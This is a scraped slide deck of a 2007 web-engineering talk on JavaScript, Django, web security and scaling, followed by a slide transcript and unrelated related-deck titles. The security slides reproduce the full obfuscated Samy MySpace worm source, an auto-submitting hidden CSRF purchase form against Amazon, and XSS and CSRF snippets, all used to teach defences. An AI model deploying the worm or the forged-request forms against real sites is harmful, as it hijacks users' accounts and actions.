How to build the Web
        Simon Willison
     30th November 2007
This talk

• Modern client-side engineering
• Server-side engineering and web frameworks
• Web application security
• Building sites that scale
What to build
• Product design
• Information architecture
• User experience
• Social software design
• Usability
• Marketing
• ...

How to build it
• Client-side engineering (Browsers!)
• Server-side engineering (Servers!)
Client-side engineering
The great myth of
client-side development
     “It’s way easier than server-side
  development - after all, it’s just HTML”
That’s hogwash
“Yahoo! Juku is a comprehensive, 3-6 month
   program to train professional front end
   developers. The curriculum includes advanced
   topics in JavaScript, DOM, HTML, CSS, YUI,
   performance, and accessibility.

   Why train raw recruits to this degree? Well,
   in the San Francisco Bay Area,
   including the Silicon Valley, it’s
   hard-as-heck to find good front end
   programmers and web designers.”




http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html
Quines

char*f="char*f=%c%s%c;main(){printf(f,34,f,34,10);}%c";main(){printf(f,34,f,34,10);}
Polyglots
http://ideology.com.au/polyglot/
C, Perl, Pascal, Fortran, COBOL, PostScript, bash/sh/csh, x86 assembler

(*O/*_/
Cu #%* )pop mark/CuG 4 def/# 2 def%%%%@@P[TX---PP_SXPY!Ex(mx2ex("SX!Ex4P)Ex=
CuG #%*                                                                      *+Ex=
CuG #%*------------------------------------------------------------------*+Ex=
CuG #%*    POLYGLOT - a program in eight languages       15 February 1991 *+Ex=
CuG #%*    10th Anniversary Edition                        1 December 2001 *+Ex=
CuG #%*    Written by Kevin Bungard, Peter Lisle, and Chris Tham             *+Ex=
CuG #%*------------------------------------------------------------------*QuZ=
CuG #%*                                                                      *+Ex=
CuG #%*!Mx)ExQX5ZZ5SSP5n*5X!)Ex+ExPQXH,B+ExP[-9A-9B(g?(gA'UTTER_XYZZXX!X *+
CuG #(*                                                                      *(
C   # */);                                                                 /*(
C   # *) program           polyglot (output);                              (*+
C   #      identification division.
C   #      program-id.     polyglot.
C   #
C   #      data            division.
C   #      procedure       division.
C   #
C   # * ))cleartomark     /Bookman-Demi findfont 36 scalefont setfont      (
C   #*                                                                     (
C   #
C   #*                     hello polyglots$
C   #      main.
C   #           perform
C /# * ) 2>_$$; echo      "hello polyglots"; rm _$$; exit;
C   #*(
C   #
C      *0 ) unless print "hello polyglots\n"; __END__
                print
C               stop run.
      -*,                 'hello polyglots'
C
C          print.
C               display   "hello polyglots".                               (
C      */ int i;                                                           /*
C      */ main () {                                                        /*
C      */       i=printf ("hello polyglots\n"); O= &i; return *O;          /*
C      *)                                                                  (*
C      *) begin                                                            (*
C      *)       writeln ('hello polyglots');                               (*
C      *)                                                                  (* )
C      * ) pop 60 360                                                      (
C      * ) pop moveto     (hello polyglots) show                           (
C      * ) pop showpage                                                    ((
C      *)
            end                                                            .(* )
C)pop%      program        polyglot.                                       *){*/}
Rendering engines
• Opera desktop, Opera mobile, Nintendo Wii, Nintendo DS
• Safari, iPhone, Nokia Series 60, Google Android
• Firefox, Iceweasel, Camino, Galeon
• Internet Explorer: sadly still 85% of the market
IE is the problem child
• Microsoft simply stopped updating it once
  they had won the browser wars... IE 6 came
  out in 2001!
• Still has shaky support for CSS 2.1
• Many JavaScript APIs developed before
  standards even existed
• Requires a disproportionate amount of
  development time
• Status of IE 8 is uncertain
Recommendations
• Develop to the standards using Firefox
• The cases where IE deviates from the
  standards are relatively well understood, and
  can usually be worked around
• Avoid CSS hacks; conditional comments are
  your friend
  <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/ieonly.css"><![endif]-->
Accessibility
•   Assistive technology thrives on semantic HTML

    •   <label> elements for forms

    •   <h1>...<h6> headers for structure

    •   Avoiding tables for layout

•   Watch a video of a screen reader user; they may well
    browse faster than you do

•   Accessibility is much more than just screen readers -
    colour blindness, motor disorders, learning
    disabilities, even just poor eyesight
JavaScript
    “JavaScript was a rushed little hack for
Netscape 2 that was then frozen prematurely
     during the browser wars, and evolved
 significantly only once by ECMA. So its early
     flaws were never fixed, and worse, no
   virtuous cycle of fine-grained community
         feedback [...] ever occurred.”
                              -Brendan Eich
But despite that...
• JavaScript is actually a really neat little
   language
  • Functions are first-class objects
  • Lexical closures
  • Objects are hash tables
• If you take the time to learn it, it will repay
   you handsomely
Ajax
February 2005
AJAX vs. Ajax
• AJAX: “Asynchronous JavaScript + XML”
• Ajax: “Any technique that allows the client to retrieve more data from the server without reloading the whole page”
Unobtrusive JavaScript
• JavaScript isn't always available
 • Security conscious organisations (and
    users) sometimes disable it
  • Some devices may not support it (mobile
    phones for example)
  • Assistive technologies (screen readers)
    may not play well with it
  • Search engine crawlers won't execute it
• Unobtrusive: stuff still works without it!
Progressive enhancement
• Start with solid markup
• Use CSS to make it look good
• Use JavaScript to enhance the usability of the
  page


• The content remains accessible no matter
  what
Unobtrusive examples
labels.js




• One of the earliest examples of this
  technique, created by Aaron Boodman (now
  of Greasemonkey and Google Gears fame)
How it works
         <label for="search">Search</label>
         <input type="text" id="search" name="q">

• Once the page has loaded, the JavaScript:
 • Finds any label elements linked to a text field
 • Moves their text into the associated text field
 • Removes them from the DOM
 • Sets up the event handlers to remove the
    descriptive text when the field is focused
• Clean, simple, reusable
easytoggle.js
  • An unobtrusive technique for revealing
     panels when links are clicked

<ul>
  <li><a href="#panel1" class="toggle">Panel 1</a></li>
  <li><a href="#panel2" class="toggle">Panel 2</a></li>
  <li><a href="#panel3" class="toggle">Panel 3</a></li>
</ul>


<div id="panel1">...</div>
<div id="panel2">...</div>
<div id="panel3">...</div>
How it works
•   When the page has loaded...

    •   Find all links with class="toggle" that reference an
        internal anchor

    •   Collect the elements that are referenced by those
        anchors

    •   Hide all but the first

    •   Set up event handlers to reveal different panels when a
        link is clicked

•   Without JavaScript, links still jump to the right point
Django filter lists

• Large multi-select boxes aren't much fun
 • Painful to scroll through
 • Easy to lose track of what you have
    selected
• Django's admin interface uses unobtrusive
  JavaScript to improve the usability here
• Ajax is often used to avoid page refreshes
• So...
 • Write an app that uses full page refreshes
 • Use unobtrusive JS to "hijack" links and
    form buttons and use Ajax instead

• Jeremy Keith coined the term "Hijax" to
  describe this
JavaScript libraries
      “The bad news:
  JavaScript is broken.
      The good news:
   It can be fixed with
    more JavaScript!”
                 - Geek folk saying
Main contenders
• Prototype
• The Yahoo! User Interface Library
• The Dojo Toolkit
• jQuery
• It’s worth evaluating these in detail, but if
  you only have time to learn one...
The short answer: use jQuery
Client-side performance
• Relatively new field, pioneered by the
  performance team at Yahoo!
• A few simple changes can make a huge
  difference to perceived loading times
• Example tip: serve your static files (CSS,
  images etc) from a separate domain - that
  way the cookies from your regular domain
  won’t slow down the requests
Server-side engineering
URL design


(Yes, I should probably be calling them URIs)
Bad URLs
    example.com/index.html
    example.com/article.php?sectionId=2343&contentId=638
    example.com/blog/2007/December.aspx
    www.amazon.com/dp/0596516177?tag=davidflanagancom&camp=14573&creative=327641&linkCode=as1&creativeASIN=0596516177&adid=165MWWERY4H71AJERGNZ&

•   Unnecessary filenames

•   Expose implementation details

•   Overly complex
Characteristics of
       good URLs
• “Cool URIs don’t change”
• Guessable
• Hackable
• Readable over the phone
• Reflects the hierarchy of the site and its data
A good URL
• simonwillison.net/2007/Nov/27/thumbnail/
• Short, hackable, no implementation exposed
• No matter what you’re building, including
  the year can be really useful in allowing you
  to change your opinion on your URLs later
  on without breaking old links
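
A minimal sketch of what "hackable" can mean on the server side, assuming a regex-based router. The pattern and the resolve() helper are hypothetical and only illustrate the idea; they are not how simonwillison.net is actually implemented.

```python
import re

# Hypothetical pattern for URLs shaped like /2007/Nov/27/thumbnail/.
# Every trailing segment is optional, so chopping the end off a URL
# still gives a valid, less specific URL.
URL_PATTERN = re.compile(
    r"^/(?P<year>\d{4})/"
    r"(?:(?P<month>[A-Z][a-z]{2})/"
    r"(?:(?P<day>\d{1,2})/"
    r"(?:(?P<slug>[\w-]+)/)?)?)?$"
)


def resolve(path):
    """Return the URL components that are present, or None if nothing matches."""
    match = URL_PATTERN.match(path)
    if match is None:
        return None
    return {key: value for key, value in match.groupdict().items() if value is not None}


print(resolve("/2007/Nov/27/thumbnail/"))  # a single entry
print(resolve("/2007/Nov/"))               # hacked back to a month archive
print(resolve("/article.php"))             # not part of the scheme
```

Because the year is the first segment, a future redesign could claim a different shape for newer URLs while the older ones keep resolving.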
The Open Source stack
• The only option I would consider
• Open source means:
 • Zero vendor lock-in; many open-source
    components are interchangeable
 • Better support (fix it yourself, or pay
    someone smart to fix it for you)
 • Fewer bugs and better quality code
Dynamic languages




   http://xkcd.com/303/
Dynamic languages
•   Social applications in particular are almost
    impossible to get right first time

•   Development only really starts after you’ve
    launched something and seen what people use
    it for

•   Speed and flexibility of development are critical

•   Dynamic languages let you get more done with
    fewer lines of code (which means fewer bugs)
LAMP

• Linux
• Apache
• MySQL
• PHP/Perl/Python
LAMP, evolved

• Linux / FreeBSD / Solaris
• Apache / Lighttpd / nginx / ...
• MySQL / PostgreSQL
• PHP/Perl/Python / Ruby
Web frameworks

• Ruby: Ruby on Rails
• Python: Django, Pylons, TurboGears
• PHP: Symfony, CakePHP, Zend Framework
• Perl: Catalyst, Maypole
Django
Lawrence, Kansas - 2003
• Two developers
• Two designers
• Around a dozen editorial staff
How do you build a site
   like lawrence.com?
• Interns - unpaid labour!
• A big relational database
 • Newspaper people are baffled by these...
• ... so you need a good interface for it
• And as many development shortcuts as possible
Characteristics

• Clean URLs
• Loosely coupled components
• Designer-friendly templates
• Less code
• The “good bits” from PHP
The Django stack
• HTTP handling
• Models (an ORM)
• Views
• Templates
• Extras
 • Admin, RSS framework, generic views...
The Django workflow

• Build the models
• Instant admin! Content people can start
  adding data
• Write the views
• Throw the templates to the designers
Open source Django
•   Django has been open-source since mid-2005
    •   The newspaper has been able to hire
        excellent developers from the community
    •   The newspaper CMS is sold as Ellington;
        one of the features is that you can hire your
        own Django developers to modify it
    •   Django has been hugely improved by
        contributions from outside the newspaper
www.djangosites.org
www.djangoproject.com
Don’t Repeat Yourself
All frameworks provide:

• A recommended way of laying out code
• Separation of application and presentation
  logic using a template system
• An ORM, to reduce the amount of code
  needed to talk to a database
• Reusable components for common tasks
Security
Three key attacks


• SQL injection
• XSS (cross-site scripting)
• CSRF (cross-site request forgery)
SQL injection
• SQL injection is inexcusable
• If the environment you are using doesn’t
  protect against this for you (through
  parameterised queries), use a different tool
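
As a rough illustration of what a parameterised query buys you, here is a sketch using Python's built-in sqlite3 module. The users table and both helper functions are made up for the example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])


def find_user_unsafe(name):
    # DON'T do this: the input is pasted straight into the SQL text.
    return conn.execute(f"SELECT name FROM users WHERE name = '{name}'").fetchall()


def find_user_safe(name):
    # The ? placeholder sends the value separately from the SQL text,
    # so it is never interpreted as SQL.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


malicious = "nobody' OR '1'='1"
print(find_user_unsafe(malicious))  # every row comes back
print(find_user_safe(malicious))    # no rows: the input is just an odd name
```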
Cross-site scripting

• The most common security hole on the web
  http://example.com/search?q=<script>alert("hello");</script>
  You searched for <?php echo $_GET['q']; ?>

• Massive security hole!
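
The usual fix is to escape user input at the point where it is written into HTML. The example above is PHP; the sketch below shows the same idea in Python with the standard library's html.escape. The render_search_heading() function is a hypothetical stand-in for a template.

```python
from html import escape


def render_search_heading(query):
    # Escape on output so <, >, & and quotes become harmless entities.
    return "You searched for " + escape(query)


print(render_search_heading('<script>alert("hello");</script>'))
```

The browser then displays the script tag as text instead of running it.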
XSS attackers can...
• Replace your logo with something obscene
• Steal your user’s authentication cookies
• Re-target login forms to point to a password
  stealing script
• Perform any action that the user is allowed
  to perform themselves
• Create self-propagating worms
http://namb.la/popular/   http://namb.la/popular/tech.html

          samy is my hero
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var
D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function
getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var
E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split
('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if
(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M)
{getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var
N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while
(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval
('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-
urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)
+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn
(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var
V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var
Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new
ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var
AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE)
{AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}
var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring
(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']
='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?
fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}
var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS
['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?
fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/
index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend
(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?
fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if
(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL
(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?
fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2)
{return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-
Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></
DIV>
HTML is dangerous
• It’s best not to allow un-trusted users to
  submit HTML at all
• If you let them submit HTML, you’ll need an
  industrial grade HTML parser (which
  emulates browsers, not just the HTML spec)
  and a very restrictive whitelist
• CSS can include JavaScript, and even regular
  CSS positioning can be used for phishing
CSRF
•   Much less widely understood than XSS...

•   ... but almost certainly more common

•   Cross-site request forgery attacks allow
    attackers to force your users to take actions on
    your site that they didn’t mean to take
•   <img src="http://example.com/admin/delete.php?id=5">

•   Not just GET; hidden forms allow POST as well
<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
<form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden">
<input type="hidden" name="ASIN" value="059600656X" />
<input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
</form>
<script>document.forms.csrf.submit();</script>



  http://shiflett.org/blog/2007/mar/my-amazon-anniversary
Defence against CSRF

• You need to know if the form that is being
  submitted is one that you served up from
  your own site (as opposed to an evil form
  created by an attacker)
• Include a hidden form field with a token
  generated by your site and associated with
  the logged in user in a non-predictable way
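
One possible way to build such a token, sketched with Python's standard library: derive it from the user's session with an HMAC keyed by a server-side secret. SECRET_KEY, the session identifier, and the csrf_token field name are all assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Assumption: a secret that is generated once and never leaves the server.
SECRET_KEY = secrets.token_bytes(32)


def make_csrf_token(session_id):
    """Derive a token from the user's session that an attacker cannot predict."""
    return hmac.new(SECRET_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def is_valid_csrf_token(session_id, submitted_token):
    """Compare the hidden form field with the token expected for this session."""
    expected = make_csrf_token(session_id)
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(expected.encode("utf-8"), submitted_token.encode("utf-8"))


session_id = "session-of-logged-in-user"  # hypothetical session identifier
token = make_csrf_token(session_id)
hidden_field = f'<input type="hidden" name="csrf_token" value="{token}">'
print(hidden_field)
```

A form built on an attacker's site cannot include the right value, so the server can reject any submission whose token fails the check.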
Building sites that scale
Scalability is not
       performance
Scalable systems increase their performance
 as new hardware is added, proportional to
           the hardware’s capacity
Vertical vs. horizontal
•   Vertical scaling: buy a bigger machine

    •   More RAM

    •   More CPU(s)

    •   “Big iron” costing $100,000+

•   Horizontal scaling: buy more machines

    •   Almost always better than vertical scaling

    •   But... software must be designed to scale out
“Premature
optimisation is the
 root of all evil”
             - Tony Hoare and
               Donald Knuth
http://blog.ilike.com/ilike_team_blog/2007/06/holy_cow_6mm_us.html
“Shared nothing”
• Rasmus Lerdorf, the creator of PHP,
  describes this as a key principle of scaling
• Application servers (web servers running
  PHP) have no shared state - everything
  stateful is pushed out to the database layer
• This lets you trivially horizontally scale your
  application servers behind a load balancer
• Now you just have to scale the data layer...
Four steps to building a
  scalable data layer
• Add caching
• De-normalise where necessary
• Add database replication
• Add sharding
Caching
• You could cache to disk or shared memory...
• ... but you’re better off using memcached
 • Distributed key/value in-memory caching
    system, first developed for LiveJournal
 • Facebook, YouTube, Wikipedia, Flickr...
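    def get_obj(obj_id):
        # memcache is assumed to be an already-connected memcached client
        obj = memcache.get(obj_id)
        if obj is None:
            # Cache miss: rebuild from the database, then cache it for next time
            obj = construct_obj_from_database(obj_id)
            memcache.set(obj_id, obj)
        return obj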
“Normalised data
        is for sissies”
                          Cal Henderson, Flickr

• You can get a major speed-up by duplicating
  some data (e.g. counts) in your database
• Your application logic will need to keep
  everything in sync
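
A small sketch of a denormalised count, using sqlite3 so it runs anywhere. The photos and comments tables are invented for the example. The point is that the duplicated comment_count column is updated in the same transaction as the comment itself.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE photos (
        id INTEGER PRIMARY KEY,
        title TEXT,
        comment_count INTEGER NOT NULL DEFAULT 0
    );
    CREATE TABLE comments (id INTEGER PRIMARY KEY, photo_id INTEGER NOT NULL, body TEXT);
    INSERT INTO photos (id, title) VALUES (1, 'Sunset');
""")


def add_comment(photo_id, body):
    # One transaction: the comment and the duplicated count change together.
    with conn:
        conn.execute("INSERT INTO comments (photo_id, body) VALUES (?, ?)", (photo_id, body))
        conn.execute("UPDATE photos SET comment_count = comment_count + 1 WHERE id = ?", (photo_id,))


def comment_count(photo_id):
    # Cheap read: no COUNT(*) over the comments table.
    return conn.execute("SELECT comment_count FROM photos WHERE id = ?", (photo_id,)).fetchone()[0]


add_comment(1, "Lovely")
add_comment(1, "Great colours")
print(comment_count(1))
```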
Replication
• Master-slave replication lets you set up
  copies of the database to accelerate reads

            Writes all go
            to master
                                    Master




               Slave                Slave                Slave




                        Reads spread across all slaves
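
The routing in the diagram above could be sketched like this. The ReplicatedDatabase class is hypothetical, and plain strings stand in for real database connections. A real router would also have to cope with slaves lagging behind the master.

```python
import itertools


class ReplicatedDatabase:
    """Route writes to the master and spread reads across the slaves."""

    def __init__(self, master, slaves):
        self.master = master
        self._slaves = itertools.cycle(slaves)  # simple round-robin

    def connection_for(self, sql):
        # Naive rule for the sketch: only SELECT statements count as reads.
        if sql.lstrip().upper().startswith("SELECT"):
            return next(self._slaves)
        return self.master


db = ReplicatedDatabase("master", ["slave-1", "slave-2", "slave-3"])
print(db.connection_for("INSERT INTO users (name) VALUES ('alice')"))
print(db.connection_for("SELECT * FROM users"))
print(db.connection_for("SELECT * FROM users"))
```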
Replication
•   Master-master replication provides redundant
    masters, but doesn’t really improve write
    performance (both still have to make the same
    number of writes)
           Writes all go
           to masters
                               Master              Master




                     Slave               Slave                Slave




                             Reads spread across all slaves
Sharding
• Sometimes known as federation
• Users 1-1000 are on database A, 1001-2000
  are on database B...
• Often requires a large scale re-write of the
  system
• Much harder to do in social applications
  where relationships span multiple databases
• WordPress MU is an interesting case-study
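
Range-based sharding comes down to a lookup from user ID to database. A minimal sketch, assuming contiguous ID ranges; the shard names and boundaries are illustrative only.

```python
import bisect

# Hypothetical layout: each shard holds a contiguous range of user IDs.
# SHARD_UPPER_BOUNDS[i] is the highest user ID stored on SHARD_NAMES[i].
SHARD_UPPER_BOUNDS = [1000, 2000, 3000]
SHARD_NAMES = ["database-a", "database-b", "database-c"]


def shard_for_user(user_id):
    """Return the name of the database that stores this user's data."""
    if user_id < 1:
        raise ValueError("user IDs start at 1")
    index = bisect.bisect_left(SHARD_UPPER_BOUNDS, user_id)
    if index == len(SHARD_NAMES):
        raise LookupError(f"no shard configured for user {user_id}")
    return SHARD_NAMES[index]


print(shard_for_user(42))
print(shard_for_user(1500))
```

The lookup is the easy part. Any query that needs users from two different shards now has to be stitched together in application code, which is why social applications find this hard.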
Scalable business models
•   Scaling gets a lot easier if you build it into your
    business model

    •   37signals products (Basecamp, Highrise)
        shard naturally based on individual customer
        accounts - and more customers means more
        money for servers

    •   Second Life shards by land area, and land
        has to be bought by users - they’re essentially a
        3D web hosting company
Build it on Amazon
• S3 - Simple Storage Service
 • Cheap, robust key-value storage of both
    small and large files
• EC2 - Elastic Compute Cloud
 • On-demand instant virtual servers, billed
    by the hour
• SQS - Simple Queue Service
Thank you!
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through Observability
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 

How to build the Web

  • 1. How to build the Web Simon Willison 30th November 2007
  • 2. This talk • Modern client-side engineering • Server-side engineering and web frameworks • Web application security • Building sites that scale
  • 3. What to build How to build it Product design Browsers! Information architecture Client-side engineering User experience Social software design Servers! Usability Server-side engineering Marketing ...
  • 5. The great myth of client-side development “It’s way easier than server-side development - after all, it’s just HTML”
  • 7. “Yahoo! Juku is a comprehensive, 3-6 month program to train professional front end developers. The curriculum includes advanced topics in JavaScript, DOM, HTML, CSS, YUI, performance, and accessibility. Why train raw recruits to this degree? Well, in the San Francisco Bay Area, including the Silicon Valley, it’s hard-as-heck to find good front end programmers and web designers.” http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html
  • 9. Polyglots • “POLYGLOT - a program in eight languages”, 15 February 1991; 10th Anniversary Edition, 1 December 2001 • Written by Kevin Bungard, Peter Lisle, and Chris Tham • One source file that prints “hello polyglots” as COBOL, Pascal, Fortran, C, PostScript, bash/sh/csh, x86 assembler and Perl • http://ideology.com.au/polyglot/
  • 11. Rendering engines • Opera desktop, Opera mobile, Nintendo Wii, Nintendo DS • Safari, iPhone, Nokia Series 60, Google Android • Firefox, Iceweasel, Camino, Galeon • Internet Explorer: sadly still 85% of the market
  • 12. IE is the problem child • Microsoft simply stopped updating it once they had won the browser wars... IE 6 came out in 2001! • Still has shaky support for CSS 2.1 • Many JavaScript APIs developed before standards even existed • Requires a disproportionate amount of development time • Status of IE 8 is uncertain
  • 13. Recommendations • Develop to the standards using Firefox • The cases where IE deviates from the standards are relatively well understood, and can usually be worked around • Avoid CSS hacks; conditional comments are your friend <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/ieonly.css"><![endif]-->
  • 16. Accessibility • Assistive technology thrives on semantic HTML • <label> elements for forms • <h1>...<h6> headers for structure • Avoiding tables for layout • Watch a video of a screen reader user; they may well browse faster than you do • Accessibility is much more than just screen readers - colour blindness, motor disorders, learning disabilities, even just poor eyesight
  • 17. JavaScript “JavaScript was a rushed little hack for Netscape 2 that was then frozen prematurely during the browser wars, and evolved significantly only once by ECMA. So its early flaws were never fixed, and worse, no virtuous cycle of fine-grained community feedback [...] ever occurred.” -Brendan Eich
  • 18. But despite that... • JavaScript is actually a really neat little language • Functions are first-class objects • Lexical closures • Objects are hash tables • If you take the time to learn it, it will repay you handsomely
  • 20. Ajax
  • 22. AJAX vs. Ajax • AJAX: “Asynchronous JavaScript + XML”
  • 23. AJAX vs. Ajax • AJAX: “Asynchronous JavaScript + XML” • Ajax: “Any technique that allows the client to retrieve more data from the server without reloading the whole page”
  • 24. Unobtrusive JavaScript • JavaScript isn't always available • Security conscious organisations (and users) sometimes disable it • Some devices may not support it (mobile phones for example) • Assistive technologies (screen readers) may not play well with it • Search engine crawlers won't execute it • Unobtrusive: stuff still works without it!
  • 25. Progressive enhancement • Start with solid markup • Use CSS to make it look good • Use JavaScript to enhance the usability of the page • The content remains accessible no matter what
  • 27. labels.js • One of the earliest examples of this technique, created by Aaron Boodman (now of Greasemonkey and Google Gears fame)
  • 30. How it works <label for="search">Search</label> <input type="text" id="search" name="q"> • Once the page has loaded, the JavaScript: • Finds any label elements linked to a text field • Moves their text into the associated text field • Removes them from the DOM • Sets up the event handlers to remove the descriptive text when the field is focused • Clean, simple, reusable
  • 31. easytoggle.js • An unobtrusive technique for revealing panels when links are clicked <ul> <li><a href="#panel1" class="toggle">Panel 1</a></li> <li><a href="#panel2" class="toggle">Panel 2</a></li> <li><a href="#panel3" class="toggle">Panel 3</a></li> </ul> <div id="panel1">...</div> <div id="panel2">...</div> <div id="panel3">...</div>
  • 34. How it works • When the page has loaded... • Find all links with class="toggle" that reference an internal anchor • Collect the elements that are referenced by those anchors • Hide all but the first • Set up event handlers to reveal different panels when a link is clicked • Without JavaScript, links still jump to the right point
  • 35. Django filter lists • Large multi-select boxes aren't much fun • Painful to scroll through • Easy to lose track of what you have selected • Django's admin interface uses unobtrusive JavaScript to improve the usability here
